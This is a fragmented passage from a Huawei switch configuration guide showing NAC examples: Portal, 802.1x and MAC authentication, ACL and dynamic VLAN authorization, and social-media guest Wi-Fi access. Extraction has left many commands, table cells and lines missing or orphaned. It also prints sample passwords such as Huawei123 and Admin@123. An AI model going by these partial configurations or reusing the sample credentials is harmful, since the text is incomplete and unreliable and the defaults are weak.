seconds.
4. Enable Portal authentication and configure network access rights for users in the pre-
authentication domain and post-authentication domain.
[SwitchC] authentication unified-mode //Set the NAC mode to unified. By
default, the switch works in unified mode. After changing the NAC mode from
common to unified, save the configuration and restart the switch to make the
configuration take effect.

[SwitchC] portal-access-profile name web1
[SwitchC-portal-acces-profile-web1] web-auth-server portal_huawei direct
[SwitchC-portal-acces-profile-web1] quit
# Configure an authentication-free rule profile and specify network access rights for
users in the pre-authentication domain.
[SwitchC] free-rule-template name default_free_rule
[SwitchC-free-rule-default_free_rule] free-rule 1 destination ip 172.16.1.2
the authentication.
[SwitchC-free-rule-default_free_rule] free-rule 2 destination ip 172.16.1.3
the authentication.
[SwitchC-free-rule-default_free_rule] quit

[SwitchC] authentication-profile name p1
[SwitchC-authen-profile-p1] portal-access-profile web1 //Bind the Portal
access profile web1.
[SwitchC-authen-profile-p1] quit

[SwitchC-Vlanif103] authentication-profile p1 //Enable Portal
authentication on the interface connecting to the R&D department.
[SwitchC-Vlanif103] authentication-profile p1 //Enable Portal
authentication on the interface connecting to the marketing department.
# Configure network access rights for the post-authentication domain.

[SwitchC] acl 3001 //Configure the post-authentication domain for R&D
employees.
[SwitchC-acl-adv-3001] rule 1 permit ip //Allow R&D employees to access
all resources.
[SwitchC] acl 3002 //Configure the post-authentication domain for
[SwitchC-acl-adv-3002] rule 3 permit ip //Allow marketing employees to

[SwitchC] quit

and press Enter.







department.
b. Click Add.
Name SW -

with the SC.

Quidway Series

the switch.

switch.


interval
(minute)

the default value.
Allowed IP 192.168.0.1/24; -
Addresses 192.168.1.1/24


d. Click OK.
different.



Name R&D employee -

authorization rule
Department R&D -



authentication.

----End
Configuration Files
# Configuration file of the access switch for the R&D department
#
sysname SwitchA
#
vlan batch 101
#
#
#
return
# Configuration file of the access switch for the marketing department

#
sysname SwitchB
#
vlan batch 102
#
#
#
return

#
sysname SwitchC
#
#
#
domain portal
#
dhcp enable
#
radius-server shared-key cipher %#%#lJIB8CQ<:A;x$h2V5+;+C>HwC+@XAL)ldpQI}:$X%#%#
weight 80
radius-server accounting 172.16.1.1 1813 source ip-address 172.16.1.254 weight 80
#
acl number 3001
rule 1 permit ip
acl number 3002
rule 3 permit ip
#


#
port 50200
source-ip 172.16.1.254
#
#
aaa
domain portal
#
interface Vlanif101
ip address 192.168.0.1 255.255.255.0
#
interface Vlanif102
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif103
ip address 172.16.1.254 255.255.255.0
#
#
#
#
portal quiet-period
#
return


Network (Authentication Point on Aggregation Switch)
Overview
On a NAC network, the 802.1x, MAC address, and Portal authentication modes are
configured on the user access interfaces of a device to meet various authentication
requirements. Users can access the network using any authentication mode.
Configuration Notes
l NOTE
Switches.
Command Function

interface.

interface.



Command Function

l The access switches on the network do not support 802.1x authentication.
To reduce network reconsutrction investment, you are advised to configure the 802.1x
authentication function on the aggregation switch and connect a single centralized
authentication server to the aggregation switch in bypass mode. MAC address authentication
needs to be configured for dumb terminals.


192.168.100.100 192.168.102.100

(Server: SM&SC&DB) (Key network resources)
Core layer GE1/0/6

Internet
SwitchA

Access layer
SwitchC SwitchD
GE0/0/1 GE0/0/2 GE0/0/1 GE0/0/2
packets
Data Plan

Item Data

server
Aggregation switch (SwitchA) l VLAN to which 1/0/6 connected to the server

belongs: VLAN 100
l VLAN to which downstream interfaces GE1/0/1
and GE1/0/2 belong: VLAN 200
Access switch (SwitchC) User VLAN ID: 200
Access switch (SwitchD) User VLAN ID: 200

Table 10-22 Aggregation switch service data plan
Item Data


Item Data

Password: Huawei123
1. Configure the aggregation switch, including the VLANs interfaces belong to, parameters
for connecting to the RADIUS server, enabling NAC authentication, and access right to
the post-authentication domain.
NOTE
2. Configure the access switches, including the VLANs and 802.1x transparent
transmission.


Agile Controller.
Procedure
forwarded.
connected to SwitchC.
connected to SwitchD.
connected to the server.
[SwitchA-Vlanif100] ip address 192.168.10.10 24 //Configure the management
IP address for SwitchA. This IP address is used when SwitchA is added to
Agile Controller.
[SwitchA-Vlanif200] ip address 192.168.200.1 24 //Configure the gateway
address for terminal users.
Configure a route to the network segment where the pre-authentication domain
resides.
Configure a route to the network segment where the post-authentication domain
resides.
RADIUS.
[SwitchA] aaa
# Configure an accounting scheme acco1. Set the accounting mode to RADIUS so that
the RADIUS server can maintain account status, such as login, log-off and forced log-
off.
[SwitchA-aaa-accounting-acco1] accounting realtime 15 //Set the real-time


[SwitchA-aaa] domain isp
[SwitchA-aaa-domain-isp] authentication-scheme abc
[SwitchA-aaa-domain-isp] accounting-scheme acco1
[SwitchA-aaa-domain-isp] radius-server rd1
[SwitchA-aaa-domain-isp] quit
[SwitchA-aaa] quit
# Configure the global default domain isp. During access authentication, enter a user
[SwitchA] domain isp

NOTE
# Configure a MAC access profile.

[SwitchA] mac-access-profile name m1
[SwitchA-mac-access-profile-m1] mac-authen username fixed A-123 password
[SwitchA-mac-access-profile-m1] quit
# Configure an 802.1x access profile.

NOTE
By default, an 802.1x access profile uses the EAP authentication mode. Ensure that the RADIUS server
supports EAP; otherwise, the server cannot process 802.1x authentication request packets.
[SwitchA] dot1x-access-profile name d1
[SwitchA-dot1x-access-profile-d1] quit

[SwitchA] authentication-profile name p1
[SwitchA-authen-profile-p1] mac-access-profile m1 //Bind the MAC access
profile m1.
[SwitchA-authen-profile-p1] dot1x-access-profile d1 //Bind the 802.1x
access profile d1.
[SwitchA-authen-profile-p1] quit
# Enable 802.1x authentication and MAC address authentication on GE1/0/1 and

GE1/0/2.
[SwitchA-Gigabitethernet1/0/1] authentication-profile p1 //Bind the
authentication profile p1 and enable 802.1x + MAC address combined
authentication.
[SwitchA-Gigabitethernet1/0/2] authentication-profile p1 //Bind the
authentication profile p1 and enable 802.1x + MAC address combined
authentication.

[SwitchA] acl 3002


Step 2 Configure the access switches.

forwarded. This example uses SwitchC to describe the configuration. The configuration
on SwitchD is the same as that on SwitchC.
# Create VLAN 200.
# Configure the interface connected to users as an access interface and add the interface
to VLAN 200.
# Configure the interface connected to the upstream network as a trunk interface and
configure the to allow VLAN 200.
2. Configure the device to transparently transmit 802.1x packets. This example uses
SwitchC to describe the configuration. The configuration on SwitchD is the same as that
on SwitchC.
NOTE
In this example, SwitchC and SwitchD are deployed between the authentication switch SwitchA and
users. EAP packet transparent transmission needs to be configured on SwitchC and SwitchD so that
SwitchA can perform 802.1x authentication for users.
– Method 1:
[SwitchC] l2protocol-tunnel user-defined-protocol 802.1X protocol-mac
0180-c200-0003 group-mac 0100-0000-0002
802.1X enable
802.1X enable
802.1X enable
– Method 2: This method is recommended when a large number of users exist or high
network performance is required.
[SwitchC] undo bpdu mac-address 0180-c200-0000 ffff-ffff-fff0
[SwitchC] bpdu mac-address 0180-c200-0000 FFFF-FFFF-FFFE
[SwitchC] bpdu mac-address 0180-c200-0002 FFFF-FFFF-FFFF
[SwitchC] bpdu mac-address 0180-c200-0004 FFFF-FFFF-FFFC
[SwitchC] bpdu mac-address 0180-c200-0008 FFFF-FFFF-FFF8

This following step is mandatory when you switch from method 1 to method 2.

and press Enter.







department.
Agile Controller.

Name SwitchA -

Device Huawei -
switch

the switch.

switch.

interval
(minute)

and click Move to move SwitchA to the Switch group. The configuration on
Name Access -
authentication
rule



authenticatio
n protocol





R&D employees

Group
Result domain


authentication.
----End

Configuration Files
#
sysname SwitchA
#
vlan batch 100 200
#
#
domain isp
#
radius-server shared-key cipher %#%#FP@&C(&{$F2HTlPxg^NLS~KqA/\^3Fex;T@Q9A]
(%#%#
#
#
mac-authen username fixed A-123 password cipher %#%#'Fxw8E,G-81(A3U<^HH9Sj
\:&hTdd>R>HILQYLtW%#%#
#
acl number 3002
rule 2 deny ip
#
aaa
domain isp
radius-server rd1
#
interface Vlanif100
ip address 192.168.10.10 255.255.255.0
#
interface Vlanif200
ip address 192.168.200.1 255.255.255.0
#
#
iinterface GigabitEthernet1/0/2
#
#
ip route-static 192.168.100.0 255.255.255.0 192.168.10.10
ip route-static 192.168.102.0 255.255.255.0 192.168.10.10
#
return

#
sysname SwitchC

#
vlan batch 200
#
l2protocol-tunnel user-defined-protocol 802.1x protocol-mac 0180-c200-0003
group-mac 0100-0000-0002
#
#
#
#
return
10.6.4 Example for Configuring User Authorization Based on ACL

or Dynamic VLAN Delivery
Overview
After an 802.1x user is successfully authenticated on a RADIUS server, the server sends
authorization information to the access device of the user. When the Agile Controller
functions as the RADIUS server, it can deliver multiple authorization parameters.
l ACL-based authorization is classified into ACL number-based (static ACL-based) and
dynamic ACL-based authorization.
– ACL number: If ACL number delivery is configured on the server, the authorization
information sent to the access device includes the ACL number. The access device
matches ACL rules based on the delivered ACL number to control user rights.
The RADIUS attribute used for ACL number delivery is (011) Filter-Id.
– Dynamic ACL: The server delivers rules in an ACL to the device. Users can access
network resources controlled using this ACL. The ACL and ACL rules must be
configured on the server. The ACL does not need to be configured on the device.
The RADIUS attribute used for dynamic ACL delivery is Huawei extended
RADIUS attribute (26-82) HW-Data-Filter.
l Dynamic VLAN: If dynamic VLAN delivery is configured on the server, the
authorization information sent to the access device includes the VLAN attribute. After
the access device receives the authorization information, it changes the VLAN of the
user to the delivered VLAN.
The delivered VLAN does not change or affect the interface configuration. The delivered
VLAN, however, takes precedence over the VLAN configured on the interface. That is,
the delivered VLAN takes effect after the authentication succeeds, and the configured
VLAN takes effect after the user goes offline.
The following RADIUS attributes are used for dynamic VLAN delivery:
– (064) Tunnel-Type (It must be set to VLAN or 13.)
– (065) Tunnel-Medium-Type (It must be set to 802 or 6.)
– (081) Tunnel-Private-Group-ID (It can be a VLAN ID or VLAN name.)

To ensure that the RADIUS server delivers VLAN information correctly, all the three
RADIUS attributes must be used. In addition, the Tunnel-Type and Tunnel-Medium-
Type attributes must be set to the specified values.
NOTE
The following uses ACL number and dynamic VLAN delivery as an example. The configuration differences
between ACL number delivery and dynamic ACL delivery are described in notes.
Configuration Notes
l NOTE
Switches.
l Making VLAN-based authorization take effect has the following requirements on the
link type and access control mode of the authentication interface:
– If the interface link type is hybrid and the interface has been added to a VLAN in
untagged mode, the access control mode can be MAC address-based or interface-
based.
– If the interface link type is access or trunk, the access control mode can only be
interface-based.
As shown in Figure 10-42, a large number of employees' terminals in a company connect to
the intranet through GE0/0/1 on SwitchA. To ensure network security, the administrator needs
to control network access rights of terminals. The requirements are as follows:
l Before passing authentication, terminals can access the public server (with IP address
192.168.40.1), and download the 802.1x client or update the antivirus database.
l After passing authentication, terminals can access the service server (with IP address
192.168.50.1) and devices in the laboratory (with VLAN ID 20 and IP address segment
192.168.20.10-192.168.20.100).

Intranet
Agile Controller
IP address: 192.168.30.1
SwitchB Public server

IP address: 192.168.40.1
GE1/0/1
Service server
GE0/0/3 IP address: 192.168.50.1
SwitchA
Laboratory GE0/0/2
VLAN20 GE0/0/1
VLAN10
Employees terminals
Data Plan
Table 10-24 Service data plan for the access switch

Item Data

l Authentication domain: huawei
Resources accessible to users Access rights to the public server are configured using
before authentication an authentication-free rule. The name of the
authentication-free rule profile is default_free_rule.
Resources accessible to users Access rights to the laboratory are granted using a
after authentication dynamic VLAN. The VLAN ID is 20.
Access rights to the service server are granted using an
ACL number. The ACL number is 3002.

Table 10-25 Service data plan for the Agile Controller

Item Data

Password: Huawei123
1. Configure the access switch, including the VLANs interfaces belong to, parameters for
connecting to the RADIUS server, enabling NAC, and network access rights users obtain
after passing authentication.
NOTE
In this example, ensure that reachable routes exist between SwitchA, SwitchB, servers, laboratory, and
employees' terminals.
2. Configure the Agile Controller.
d. Configure authorization results and authorization rules on the Agile Controller.
Procedure
Step 1 Configure access switch SwitchA.
1. Create VLANs and configure the allowed VLANs on interfaces to ensure network
connectivity.
connecting to employees' terminals.
connecting to the laboratory.
connecting to SwitchB.
[SwitchA] interface loopback 1

[SwitchA-LoopBack1] ip address 10.10.10.1 24 //Configure an IP address for

communication with the Agile Controller.
[SwitchA-LoopBack1] quit
# Create the AAA authentication scheme abc and set the authentication mode to
RADIUS.
[SwitchA] aaa
# Configure the accounting scheme acco1 and set the accounting mode to RADIUS.
[SwitchA-aaa-accounting-acco1] accounting realtime 15
# Create the authentication domain huawei, and bind the AAA authentication scheme
abc, accounting scheme acco1, and RADIUS server template rd1 to the domain.
[SwitchA-aaa] domain huawei
[SwitchA-aaa-domain-huawei] authentication-scheme abc
[SwitchA-aaa-domain-huawei] accounting-scheme acco1
[SwitchA-aaa-domain-huawei] radius-server rd1
[SwitchA-aaa-domain-huawei] quit
[SwitchA-aaa] quit
3. Configure an authentication-free rule profile.

[SwitchA] free-rule-template name default_free_rule
[SwitchA-free-rule-default_free_rule] free-rule 10 destination ip
192.168.40.0 mask 24
[SwitchA-free-rule-default_free_rule] quit
4. Enable 802.1x authentication.

NOTE
By default, the unified mode is enabled. Before changing the NAC mode, you must save the
configuration. After the mode is changed and the device is restarted, functions of the newly confiugred
mode take effect.
# Configure the 802.1x access profile d1.

[SwitchA] dot1x-access-profile name d1
[SwitchA-dot1x-access-profile-d1] quit
# Configure the authentication profile p1, bind the 802.1x access profile d1 and
authentication-free rule profile default_free_rule to the authentication profile, specify
the domain huawei as the forcible authentication domain in the authentication profile,
and set the user access mode to multi-authen.
[SwitchA] authentication-profile name p1
[SwitchA-authen-profile-p1] dot1x-access-profile d1
[SwitchA-authen-profile-p1] free-rule-template default_free_rule
[SwitchA-authen-profile-p1] access-domain huawei force
[SwitchA-authen-profile-p1] authentication mode multi-authen
[SwitchA-authen-profile-p1] quit

# Bind the authentication profile p1 to GE0/0/1 and enable 802.1x authentication on the
interface.
[SwitchA-GigabitEthernet0/0/1] authentication-profile p1
5. Configure the authorization parameter ACL 3002 for users who pass authentication.
NOTE
In dynamic ACL mode, this step does not need to be configured on the device.
[SwitchA] acl 3002

a. Open the Internet Explorer, enter the Agile Controller access address in the address
bar, and press Enter.
The following table describes addresses for accessing the Agile Controller.
Access Mode Description
https://Agile Controller-IP: Agile Controller-IP specifies the IP address of

8443 the Agile Controller.
IP address of the Agile If port 80 is enabled during installation, you

Controller can access the Agile Controller by entering its
IP address without the port number. The Agile
Controller URL will automatically change to
https://Agile Controller-IP:8443.
b. Enter the administrator user name and password.

user name admin and password Changeme123. Change the password immediately
2. Create a department and an account.
b. Click the Department tab in the operation area on the right, and then click Add
under the Department tab to add a department R&D.

c. Click the User tab in the operation area on the right, and then click Add under the
User tab to add a user A.
d. Click next to user A in Operation to access Account Management. Click

Add. Create a common account A-123 and set the password to Huawei123.

e. In the User tab, select user A. Click Transfer to add user A to the department
R&D.

Agile Controller.
Choose Resource > Device > Device Management. Click Add in the operation area on
the right. Set connection parameters on the Add Device page.


NOTE
Perform this step for ACL number and VLAN delivery.
Name Authorization info for -

authenticated users
Service type Access service -

VLAN 20 The VLAN must be the same

as the VLAN configured for
R&D employees on the
switch.

number/AAA same as the number of the
user group ACL configured for R&D

NOTE
Perform this step for dynamic ACL and VLAN delivery.
a. Add a dynamic ACL.

i. Choose Policy > Permission Control > Policy Element > Dynamic ACL.
ii. Click Add.
iii. Configure basic information for the dynamic ACL and click Add in Rule List.
iv. Configure attributes contained in the dynamic ACL.

c. Configure basic information for the authorization result.
Name Authorization information for -

users who pass authentication
VLAN 20 The VLAN ID must be the

same as the VLAN ID
configured for R&D
Dynamic 3002 -
ACL

After a user passes authentication, authorization phase starts. The Agile Controller grants
the user access rights based on the authorization rule.

authenticated users
Department R&D department -
Authorization Authorization info for -

result authenticated users


l An employee can only access the Agile Controller server and public server before
passing authentication.
l An employee can access the Agile Controller server, public server, service server, and
laboratory after passing authentication.
l After the employee passes authentication, run the display access-user command on the
switch. The command output shows information about the online employee.
----End

#
sysname SwitchA
#
vlan batch 10 20
#
free-rule-template default_free_rule
access-domain huawei force
#
radius-server shared-key cipher %^%#FP@&C(&{$F2HTlPxg^NLS~KqA/\^3Fex;T@Q9A](%^%#
#
acl number 3002
rule 3 deny ip
#


#
aaa
domain huawei
radius-server rd1
#
#
#
#
interface LoopBack1
ip address 10.10.10.1 255.255.255.0
#
#
return
10.6.5 Example for Configuring Guest Access Using Social Media

Accounts (GooglePlus, Facebook, or Twitter Accounts)
Overview
An enterprise has deployed an authentication system to implement access control for all the
wireless users who attempt to connect to the enterprise network. Only authenticated users can
connect to the enterprise network. Enterprise employees connect to the network through PCs
and guests connect to the network through mobile phones. The administrator has created local
accounts for the employees so that they can use the local accounts to pass authentication. For
guest accounts, the administrator needs to configure the Service Manager to enable guests to
complete authentication using GooglePlus, Facebook or Twitter accounts.
Configuration Notes
switch must be the same as those on the Agile Controller.
l Huawei's Agile Controller functions as the RADIUS server in this example. For the
Agile Controller, the minimum version required is V100R002C00SPC105.
l By default, the switch allows the packets sent to RADIUS and Portal servers to pass
through. You do not need to configure an authentication-free rule for the packets on the
switch.

l Service data forwarding modes are classified into tunnel forwarding mode and direct
forwarding mode. The tunnel forwarding mode is used in this example.
– In tunnel forwarding mode, the management VLAN and service VLAN cannot be
the same.
– In direct forwarding mode, do not configure the management VLAN and service
VLAN to be the same. You are advised to configure port isolation on the switch
interface directly connected to the AP. If port isolation is not configured, many
broadcast packets will be transmitted in VLANs or WLAN users on different APs
can directly communicate at Layer 2.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.


Softw Product Model AP Model and Version
are
Versi
on
V200 S12700 V200R007C00:

R009C AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
00 AP6510DN-AGN, AP6610DN-AGN, AP7110SN-
GN, AP7110DN-AGN, AP5010SN-GN,
AP5010DN-AGN, AP3010DN-AGN, AP6510DN-
AGN-US, AP6610DN-AGN-US, AP5030DN,
AP5130DN, AP7030DE, AP2010DN, AP8130DN,
AP8030DN, AP9330DN, AP4030DN, AP4130DN,
AP2030DN, AP9131DN, AP9132DN,
AD9430DN-24, AD9430DN-12, R230D, R240D,
AP6050DN, AP6150DN, AP7050DE, AP7050DN-
E, AP4030TN, AP4050DN-E, AP4050DN-HD
V200R006C20:
AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN,
AP6510DN-AGN, AP6610DN-AGN, AP7110SN-
AD9430DN-24, AD9430DN-12, R230D, R240D
V200R006C10:
AP3030DN, AP2030DN
In Figure 10-43, a switch functions as the AC and connects to the AP through a PoE switch.
The PoE switch provides power for the AP. You can configure WLAN services on the AC to
provide wireless access services for users.

Figure 10-43 Networking of a small-scale WLAN

Social media
authentication server
Agile Controller
(including Portal and Internet
RADIUS servers) GE1/0/2
GE1/0/3 VLAN101
VLAN102 AC
DHCP server
GE1/0/1
GE0/0/2 VLAN100
VLAN100
PoE
SwitchA
GE0/0/1
VLAN100
AP
STA STA
Management VLAN：VLAN100
Service VLAN：VLAN101
Network Data Plan

AC DHCP server 192.168.10.1-192.168.10.25 IP address pool for APs.

4/24
IP address of VLANIF 100: Gateway connected to the

192.168.10.1 AP.
192.168.20.1-192.168.20.25 IP address pool for mobile

4/24 phone users.
IP address of VLANIF 101: Gateway for mobile phone

192.168.20.1 users.
IP address of VLANIF 102: Gateway connected to the

192.168.30.1 Agile Controller.

Portal server: l The service controller

l IP address: 192.168.30.2 (SC) of the Agile
Controller integrates the
l Port number that the RADIUS server and
switch uses to process Portal server. Therefore,
Portal packets: 2000 IP addresses of the
l Destination port number authentication server,
in the packets that the accounting server, and
switch sends to the Portal Portal server are the IP
server: 50200 address of the Agile
l Portal shared key: Controller.
Admin@123 l Configure a RADIUS
accounting server to
RADIUS authentication obtain user login and
server: logout information. The
l IP address: 192.168.30.2 port numbers of the
l Port number: 1812 authentication server and
accounting server must
l RADIUS shared key: be the same as the
Admin@123 authentication and
RADIUS accounting server: accounting port numbers
of the RADIUS server.
l IP address: 192.168.30.2
l Port number: 1813
l RADIUS shared key:
Admin@123
l Accounting interval: 15
minutes
Agile Controller Domain name: Users can also use the

access.example.com domain name to access the
Portal server.
IP address: 192.168.30.2 -
Authentication port number: -

1812
Accounting port number: -

1813
RADIUS shared key: It must be the same as that

Admin@123 configured on the switch.
Port number in the packets -

received by the Portal
server: 50200
Portal shared key: It must be the same as that

Admin@123 configured on the switch.

AP group l Name: ap-group1 -

l Referenced profiles:
VAP profile wlan-vap
and regulatory domain
profile domain1
Regulatory domain profile l Name: domain1 -

l Country code: CN
SSID profile l Name: wlan-ssid -

l SSID name: wlan-net
Security profile l Name: wlan-security -

l Security policy: open
system authentication
VAP profile l Name: wlan-vap -

l Forwarding mode: tunnel
forwarding
l Service VLAN: VLAN
101
SSID profile wlan-ssid,
security profile wlan-
security, and
authentication profile p1
1. Configure network connectivity.
2. Set the NAC mode of the AC to unified.
3. Configure parameters for the AC to communicate with the Agile Controller (RADIUS
server).
4. Configure Portal authentication.
5. Configure the AP to go online.
6. Configure STAs to go online.
7. Configure the Agile Controller and social media authentication server.
Procedure
Step 1 Configure network connectivity.
# On SwitchA, add GE0/0/1 connected to the AP and GE0/0/2 connected to the AC to
management VLAN 100.


[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
# On the AC, add GE1/0/1 connected to SwitchA to VLAN 100, add GE1/0/3 connected to
the Agile Controller to VLAN 102, and add GE1/0/2 connected to the Internet to VLAN 101.
[HUAWEI] sysname AC
[AC] vlan batch 100 101 102
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit
# Configure the AC as a DHCP server based on interface address pools. VLANIF 100 assigns
IP addresses to the AP and VLANIF 101 assigns IP addresses to STAs.
[AC] dhcp enable //Enable DHCP.
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface //Configure an address pool on VLANIF
100 to assign IP addresses to the AP.
[AC-Vlanif100] quit
[AC-Vlanif101] ip address 192.168.20.1 24 //Configure an address pool on
VLANIF 101 to assign IP addresses to STAs.
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit
# Configure the gateway address of the Agile Controller.

[AC-Vlanif102] quit
Step 2 Set the NAC mode of the AC to unified.

[AC] authentication unified-mode //Set the NAC mode to unified. By default,
the switch works in unified mode. If the switch works in common mode, the
following information is displayed when this command is run to change the NAC
mode. The administrator must enter y. The switch will save the configuration and
restart immediately. Functions of the newly configured mode then take effect.
mmands, see the user manual. Save the configuration file and reboot now? [Y/N]y
Step 3 Configure parameters for the AC to communicate with the Agile Controller (RADIUS server).
[AC] radius-server template policy //Create the RADIUS server template policy.
[AC-radius-policy] radius-server authentication 192.168.30.2 1812 source ip-
address 192.168.30.1 //Configure the IP address and port number of the RADIUS
authentication server.
[AC-radius-policy] radius-server accounting 192.168.30.2 1813 source ip-address
192.168.30.1 //Configure the IP address and port number of the RADIUS
accounting server.
[AC-radius-policy] radius-server shared-key cipher Admin@123 //Set the

authentication key and accounting key to Admin@123.

[AC-radius-policy] quit
[AC] aaa //Enter the AAA view.
[AC-aaa] authentication-scheme auth //Create the authentication scheme auth.
[AC-aaa-authen-auth] authentication-mode radius //Set the authentication mode
to RADIUS.
[AC-aaa-authen-auth] quit
[AC-aaa] accounting-scheme acco // Create the accounting scheme acco.
[AC-aaa-accounting-acco] accounting-mode radius //Set the accounting mode to
RADIUS.
[AC-aaa-accounting-acco] accounting realtime 15 //Set the real-time accounting
interval to 15 minutes.
[AC-aaa-accounting-acco] quit
[AC-aaa] domain portal //Create the domain portal.
[AC-aaa-domain-portal] authentication-scheme auth //Bind the authentication
scheme auth to the domain.
[AC-aaa-domain-portal] accounting-scheme acco //Bind the accounting scheme acco
to the domain.
[AC-aaa-domain-portal] radius-server policy //Bind the RADIUS server template
policy to the domain.
[AC-aaa-domain-portal] quit
[AC-aaa] quit
[AC] domain portal //Set the domain portal as the global default domain.
# Configure parameters for the AC to communicate with the Agile Controller (Portal server).
[AC] web-auth-server portal_huawei //Configure the Portal server template
portal_huawei.
[AC-web-auth-server-portal_huawei] server-ip 192.168.30.2 //Configure the IP
address of the Portal server.
[AC-web-auth-server-portal_huawei] source-ip 192.168.30.1 //Configure the IP
address for the device to communicate with the Portal server.
[AC-web-auth-server-portal_huawei] port 50200 //Set the destination port number
in the packets sent by the AC to the Portal server to 50200, which is the same as
the port number in the packets received by the Portal server. The default port
number in the packets sent by the switch is 50100. You must manually change the
port number to 50200 for adaptation to the Portal server.
[AC-web-auth-server-portal_huawei] shared-key cipher Admin@123 //Configure the
shared key for communication with the Portal server. The shared key must be the
same as that configured on the Portal server.
[AC-web-auth-server-portal_huawei] url http://access.example.com:8080/portal //
Configure the URL of the Portal authentication page. access.example.com is the
host name of the Portal server. To ensure more secure and quick authentication
page push, you are advised to use the domain name mode. However, you need to
configure the mapping between the domain name access.example.com and the IP
address of the DNS server on the DNS server in advance.
[AC-web-auth-server-portal_huawei] quit
[AC] web-auth-server listening-port 2000 //Configure the port number used to
process Portal packets on the device. The default port number is 2000. If this
port number is changed on the server, you must also change the port number on the
switch accordingly.
[AC] portal quiet-period //Enable the quiet function for Portal authentication.
If the number of times that an authentication user fails to be authenticated
within 60 seconds exceeds the configured value, the device discards packets from
the user for a period of time to prevent impact on the system caused by frequent
authentication failures.
[AC] portal quiet-times 5 //Configure the maximum number of authentication
failures within 60 seconds before the device quiets a Portal authentication user.
[AC] portal timer quiet-period 240 //Set the quiet period for Portal
authentication to 240 seconds.

[AC] portal-access-profile name web1
[AC-portal-acces-profile-web1] web-auth-server portal_huawei direct
[AC-portal-acces-profile-web1] quit

# Configure the AC to allow users to access resources of the social media authentication
server before authentication.
[AC] acl 6000
[AC-acl-ucl-6000] rule 1 permit ip destination fqdn www.googleapis.com //
Configure the switch to allow packets sent to the Google server to pass through
before authentication.
[AC-acl-ucl-6000] rule 2 permit ip destination fqdn apis.google.com //Configure
the switch to allow packets sent to the Google server to pass through before
authentication.
[AC-acl-ucl-6000] rule 3 permit ip destination fqdn connect.facebook.net //
Configure the switch to allow packets sent to the Facebook server to pass through
[AC-acl-ucl-6000] rule 4 permit ip destination fqdn api.twitter.com //Configure
the switch to allow packets sent to the Twitter server to pass through before
authentication.
[AC-acl-ucl-6000] rule 5 permit ip destination fqdn abs.twimg.com //Configure
the switch to allow packets sent to the Twitter server to pass through before
authentication.
[AC-acl-ucl-6000] rule 6 permit ip destination fqdn mobile.twitter.com //
Configure the switch to allow packets sent to the Twitter server to pass through
[AC-acl-ucl-6000] rule 7 permit ip destination fqdn twitter.com //Configure the
switch to allow packets sent to the Twitter server to pass through before
authentication.
# Configure an authentication-free rule profile.

[AC] free-rule-template name default_free_rule
[HUAWEI-free-rule-default_free_rule] free-rule acl 6000 //Bind ACL 6000 to the
authentication-free rule profile.
[HUAWEI-free-rule-default_free_rule] quit

[AC] authentication-profile name p1
[AC-authen-profile-p1] portal-access-profile web1 //Bind the Portal access
profile web1.
[AC-authen-profile-p1] free-rule-template default_free_rule //Bind an
authentication-free rule profile.
[AC-authen-profile-p1] quit
# Configure network access rights for users in the post-authentication domain.

[AC] acl 3001 //Configure the post-authentication domain for mobile terminals.
[AC-acl-adv-3001] rule 1 permit ip //Allow authenticated users to access all
network resources.
[AC-acl-adv-3001] quit

[AC-Vlanif101] authentication-profile p1 //Enable Portal authentication on the
interface to which mobile terminals connect.
[AC-Vlanif101] quit
Step 5 Configure the AP to go online.

# Create an AP group to which the APs with the same configuration can be added.
[AC] wlan
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] quit
# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP group.
[AC-wlan-view] regulatory-domain-profile name domain1
[AC-wlan-regulate-domain-domain1] country-code cn

[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-ap-group-ap-group1] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain
configurations of the radio and reset the AP. Continu
e?[Y/N]:y
[AC-wlan-view] quit

[AC] capwap source interface vlanif 100
# Import the AP offline on the AC and add the AP to the AP group ap-group1. In this
example, the AP's MAC address is 60de-4476-e360. Configure a name for the AP based on
the AP's deployment location, so that you can know where the AP is located. For example, if
the AP with MAC address 60de-4476-e360 is deployed in area 1, name the AP area_1.
NOTE
The default AP authentication mode is MAC address authentication. If the default settings are retained,
you do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 and radio 1. Radio 0 of the
AP6010DN-AGN works on the 2.4 GHz frequency band and radio 1 works on the 5 GHz frequency
band.
[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 0 ap-mac 60de-4476-e360
[AC-wlan-ap-0] ap-name area_1
[AC-wlan-ap-0] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will
clear channel, power and antenna gain configuration
s of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-0] quit
# After the AP is powered on, run the display ap all command to check the AP state. If the
State field displays nor, the AP has gone online.
[AC-wlan-view] display ap all
nor : normal [1]
----------------------------------------------------------------------------------
---
ID MAC Name Group IP Type State STA
Uptime
----------------------------------------------------------------------------------
---
